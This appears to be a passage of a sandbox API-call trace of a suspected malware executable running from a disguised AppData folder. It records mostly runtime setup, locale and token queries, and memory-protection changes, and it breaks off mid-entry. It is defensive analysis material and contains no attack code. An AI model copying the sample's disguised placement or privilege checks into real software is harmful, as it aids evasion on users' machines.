0x7695bb9f [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") 
returned 0x76963728 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0100.746] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0100.747] GetProcAddress 
(hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0100.747] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0100.747] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0100.748] GetProcAddress 
(hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0100.748] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0100.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0100.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0100.748] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0100.749] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0100.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0100.749] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0100.749] GetProcAddress (hModule=0x769f0000, 
lpProcName="CryptReleaseContext") returned 0x769fe124 [0100.749] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0100.749] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0100.749] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0100.749] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0100.749] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0100.749] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0100.750] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0100.750] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0100.750] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 
[0100.750] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0100.750] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0100.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0100.750] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0100.750] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0100.750] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0100.750] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0100.750] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0100.751] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0100.751] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0100.751] SetThreadLocale (Locale=0x400) 
returned 1 [0100.751] GetVersion () returned 0x1db10106 [0100.751] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.751] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0100.751] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.751] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0100.751] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.751] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0100.751] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0100.752] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.752] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0100.752] GetACP () returned 0x4e4 [0100.752] GetCurrentThreadId () returned 0xc44 [0100.752] GetVersion () returned 0x1db10106 [0100.752] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x221d10, dwPlatformId=0x12fbaa, 
szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.752] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.752] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.752] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1270000 [0100.752] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.752] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.752] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.752] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.753] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.753] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0100.753] GetUserDefaultUILanguage () 
returned 0x409 [0100.753] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0100.753] GetThreadUILanguage () returned 0x120409 [0100.753] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0100.754] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x139a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x139a680, pcchLanguagesBuffer=0x12d768) returned 1 [0100.754] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0100.754] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0100.754] GetUserDefaultUILanguage () returned 0x409 [0100.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0100.754] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0100.754] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 
0x28 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: 
lpBuffer="Control-C hit") returned 0xd [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0100.755] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0100.756] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, 
dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.756] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0100.756] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2344d0 [0100.756] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0100.756] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 
| out: lpBuffer="Invalid file name - %s") returned 0x16 [0100.756] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0100.756] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.756] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13680dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0100.756] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0100.756] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0100.756] GetThreadLocale () returned 0x409 [0100.757] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0100.757] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0100.757] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.757] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0100.757] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0100.757] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2344e0 [0100.757] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0100.757] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0100.757] GetLastError () returned 0x7a [0100.757] GetLogicalProcessorInformation (in: Buffer=0x13599d0, ReturnedLength=0x12fab0 | out: Buffer=0x13599d0, ReturnedLength=0x12fab0) returned 1 [0100.757] GetCurrentThreadId () returned 0xc44 [0100.757] GetCurrentThreadId () returned 0xc44 [0100.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0100.757] GetThreadLocale () returned 0x409 [0100.757] EnumCalendarInfoW 
(lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0100.757] GetThreadLocale () returned 0x409 [0100.758] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0100.758] GetCurrentThreadId () returned 0xc44 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: 